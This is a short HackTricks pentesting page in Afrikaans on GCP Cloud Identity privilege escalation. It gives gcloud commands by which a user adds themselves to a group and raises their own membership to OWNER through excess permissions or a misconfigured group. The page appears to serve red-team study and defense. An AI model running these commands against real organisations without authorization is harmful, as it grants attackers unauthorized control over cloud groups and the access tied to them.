GCP - Cloudidentity Privesc

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Cloudidentity

Vir meer inligting oor die cloudidentity-diens, kyk na hierdie bladsy:

GCP - IAM, Principals & Org Policies Enum

Voeg jouself by 'n groep

As jou gebruiker genoeg toestemmings het of as die groep verkeerd gekonfigureer is, kan hy homself moontlik lid maak van 'n nuwe groep:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Wysig groeplidmaatskap

As jou gebruiker genoeg toestemmings het of as die groep verkeerd gekonfigureer is, kan hy homself EIENAAR van 'n groep maak waarvan hy 'n lid is:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated